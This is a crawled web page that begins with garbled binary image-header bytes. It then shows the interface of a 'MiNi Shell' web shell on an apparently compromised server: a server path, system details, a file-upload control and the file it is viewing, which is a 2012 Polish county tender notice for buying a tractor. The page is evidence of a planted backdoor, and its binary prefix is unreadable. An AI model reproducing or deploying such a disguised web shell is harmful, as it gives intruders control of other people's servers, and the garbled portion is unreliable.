JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120525/173988-N-2012.html

<p class="kh_header"><b>Kartuzy: Wykonanie  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego w 2012</b><br>
<b>Numer ogłoszenia: 173988 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kartuzach , ul. Gdańska 26, 83-300 Kartuzy, woj. pomorskie, tel. 058 6810715, faks 058 6811522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.kartuzy.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://zdp.kartuzy.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego w 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
     a) Wykonanie:  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego 
          w 2012  do  Obwodu Drogowego w Sierakowicach   ul. Brzozowa 1.

    Wymagania  techniczne  ciągnika. 
 1. Ciągnik rolniczy fabrycznie nowy, rok produkcji 2012, spełniający aktualne wymagania z zakresu BHP oraz dopuszczony do poruszania się po drogach publicznych zgodnie z przepisami Prawo o Ruchu Drogowym. 
2. Rodzaj paliwa - olej napędowy                                                            
3.Kolor  czerwony /pomarańczowy 
4.Moc  nominalna silnika  co najmniej 110kM przy około 2200ob,.z  turbodoładowaniem.  
5.Silnik czterocylindrowy z zapłonem samoczynnym, z wtryskiem bezpośrednim z chłodnicą międzystopniową intercooler spełniający normy emisji spalin co najmniej  TIER III A  

6.Dwustopniowy  filtr powietrza 

7.Mocowanie  tłumika  przy kabinie 
8.Sprężarka 
9.Skrzynia  biegów minimum 24 do przodu/18do tyłu( z rewersem elektrohydraulicznym bezsprzęgłowym)
10.Skrzynia  biegów synchronizowana 
11.Dwustopniowy  wzmacniacz sterowany  elektrohydraulicznie 
12.Możliwość jazdy w ruchu drogowym
       z prędkością do  40 km/h                                
13.Sterowanie   podnośnika ( siłowa, polowa i mieszana
14.Rozdzielacz obiegu   wewnętrznego - trzysekcyjny
15.Udźwig  podnośnika min. 55 kN 
16.Filtr oleju  hydrauliki o wydajności min. 70l/ minutę.
17.Wałek odbioru mocy 540/1000
18.Sprzęgło  tarczowe  mokre 
19.Tylni most napędowy   z hamulcami  dyskowymi - mokrymi i blokadą  mechanizmu różnicowego załączanego  elektropneumatycznie  
20.Tylni TUZ - dolne ramiona  kategorii II z hakami  CBM sterowany mechanicznie lub hydraulicznie
21.Automatyczny zaczep transportowy do przyczepy z regulacją co najmniej 6 pozycyjną . Zaczep przesuwny sterowany.
22.Instalacja elektryczna 12 V
23.Akumulator 165 Ah
24.Alternator 95Ah
25.Kabina amortyzowana z klimatyzacją , regulowaną  kierownicą,  siedzeniem pneumatycznym kierowcy,  siedziskiem dla pasażera,  podgrzewaną  szybą i lusterkami . Szyby przyciemniane   wyposażone w przednie i tylnie wycieraczki 
Zamontowana Instalacja radiowa .
Elektroniczna deska rozdzielcza ze 
 wskaźnikiem obrotów,  licznikiem Mth, wskaźnikiem  paliwa, temperatury płynu  chłodniczego, ciśnienia oleju z kontrolką ostrzegawczą 
26.W ramach  oświetlenia  wymagamy wyposażenia  w  2 - główne  światła  drogowe, 2- reflektory  robocze z przodu, 3- reflektory  robocze  z tyłu , światła  ostrzegawcze i kierunkowskazy
27.Przednia  oś napędowa  sterowana  elektropneumatycznie wyposażona  w hamulce  przednie  oraz  mechanizm różnicowy  z  redukcją poślizgu
28.Przednie koła w rozmiarze 14,9R-24
29.Tylnie  koła  w rozmiarze  18,4 R- 38
30.Możliwość  regulacji rozstawu kół
31.Napęd na cztery koła 4x4
32.Układ hamulcowy   niezależny  na 4 koła 
33.Układ pneumatyczny  do sterowania  hamulcami  przyczepy.
34.Wzmocniona  rama przodu ciągnika 
35.Przedni TUZ, plus co najmniej jedna para gniazd hydraulicznych
wyprowadzonych na przód ciągnika 
36.Hydrostatyczny układ kierowniczy 
37.Zbiornik  paliwa co najmniej 180 litrów 
38.Błotniki przednie 
39.Ciągnik należy wyposażyć także  w błotniki tylne, trójkąt ostrzegawczy,
gaśnicę, apteczkę, napis SŁUŻBA DROGOWA, zestaw narzędzi.
40.Szyberdach
41.Waga ciągnika max 4700 kg                               
42.Sprzęgło główne wielotarczowe mokre sterowane hydraulicznie
43.Mechanizm różnicowy z ograniczonym poślizgiem
44.Elektrohydrauliczne załączanie blokady mostu
45.Instalacja pneumatyczna jedno i dwu -
przewodowa
46. Gwarancja na ciągnik co najmniej 36 miesięcy
47. Zawór bezpieczeństwa używany w przypadku blokady rotora 
48. obciążniki osi przedniej - minimum 300 kg, 
49. udokumentowanie danych fabrycznych w języku polskim, 
3.4.Zamawiający określa dodatkowe wymagania związane z przedmiotem zamówienia: 
a) Do dostarczonego ciągnika należy załączyć dokumentację techniczną, w tym instrukcje obsługi w języku polskim, katalog części zamiennych i podzespołów, warunki gwarancji i książki gwarancyjne, CE producenta sprzętu pochodzących z produkcji seryjnej, dokumenty DTR. 
b) Wykonawca zamówienia wykona wstępne przeszkolenie pracownika Zamawiającego dot. uruchomienia i obsługi dostarczonego ciągnika, objętego zamówieniem.
c) wszelkie koszty związane z zamontowaniem przedniego TUZ  w ciągniku  ponosi Wykonawca zamówienia. 
3.5. Zamawiający wymaga aby odległość dojazdu serwisu wynosiła nie więcej niż 200 km do miejsca  dostawy do ZDP Kartuzy tj: Obwodu Drogowego w Sierakowicach ul. Brzozowa 1
3.6. Miejsce dostawy - plac Zamawiającego, tj: Obwód Drogowy w Sierakowicach ul. Brzozowa 1
3.7. Odbiór dostawy dokonany będzie przez pracownika wskazanego przez Zamawiającego w obecności przedstawiciela Dostawcy. 
4.0.Gwarancja jakości. 
4.1. Wykonawca na dostarczony fabrycznie nowy ciągnik udzieli gwarancji na okres minimum 36 m-cy bez określenia limitu motogodzin pracy ciągnika Okres gwarancji liczony będzie od daty sporządzenia protokółu przekazania. W okresie gwarancji Wykonawca zobowiązuje się w terminie 2 dni od telefonicznego lub pisemnego powiadomienia przystąpić do usunięcia awarii ciągnika ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie przewiduje udzielenia zamówienia uzupełniającego  na podstawie art. 67 ust.1 pkt 7   ustawy Pzp  w ilości do 20% przedmiotowego   zamówienia zakresie zgodnym z  punktem 3.0. SIWZ</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent przystępując do przetargu nie wnosi wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy
Pzp zgodnie z załączonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp zgodnie z załączonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający będzie sprawdzał metodą
spełnia/nie spełnia na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp zgodnie z załączonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp zgodnie z załączonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp zgodnie z załączonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wykonawcy - wraz z Tabelą zgodności parametrów przedmiotu zamówienia. Pełnomocnictwo do reprezentowania podmiotów występujących wspólnie lub do występowania wspólnie i zawarcia umowy w przypadku składania oferty wspólnej .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiajacy przewiduje  możliwość  zmiany  postanowień zawartych w umowie, przez sporządzenie  aneksu  w zakresie : 1) terminu  realizacji dostaw w przypadku 
   a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu zamówienia lub świadczenia stron;
   b) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności 
    spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami
   organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w
   chwili zawarcia umowy 
    2) oraz  pozostałych  warunków umowy  w przypadku  powstania rozbieżności 
    lub  niejasności w  rozumieniu pojęć użytych w umowie, których nie będzie  
    można usunąć w inny  sposób, a zmiana będzie umożliwiać usunięcie   
    rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej
   zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// zdp.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarządu Dróg Powiatowych 
ul. Gdańska 26, 83-300 Kartuzy 
pok.26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 10:45, miejsce: Zarządu Dróg Powiatowych 
ul. Gdańska 26, 83-300 Kartuzy 
pok.26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com